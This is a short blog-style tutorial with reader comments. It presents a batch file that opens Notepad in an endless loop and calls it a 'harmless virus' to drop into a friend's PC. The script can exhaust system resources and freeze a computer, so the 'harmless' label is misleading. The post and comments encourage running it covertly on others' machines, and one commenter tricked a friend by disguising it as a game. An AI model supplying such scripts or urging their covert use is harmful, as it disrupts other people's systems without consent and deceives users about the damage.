Hacking system with ease and comfort


This is step by step tutorial that explains how to make harmless virus that open the notepad continuously. This is non-destructive virus to your computer system. If you want to have some fun with your friends , drop this cool harmless virus into his pc.

Steps:

1. Launch Notepad and paste the following code and save the file as notepad.bat.

Code:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Now enjoy yourself…

Comments on: "Create Harmless Virus That Open The Notepad Continuously" (4)

  1. good creation……..it will help me to distrub my frnds PC

  2. jemymathewbibi said:

    superb i tried

  3. I'm Not Really Here~!!! said:

    oh god my friends tried this on my computer and it’s funny because I did it to him as well but I pretended it was an awesome game~!!!! and of course he fell for it

  4. stephen oppong said:

    well doesn’t know much about this software can u help me

Leave a Reply

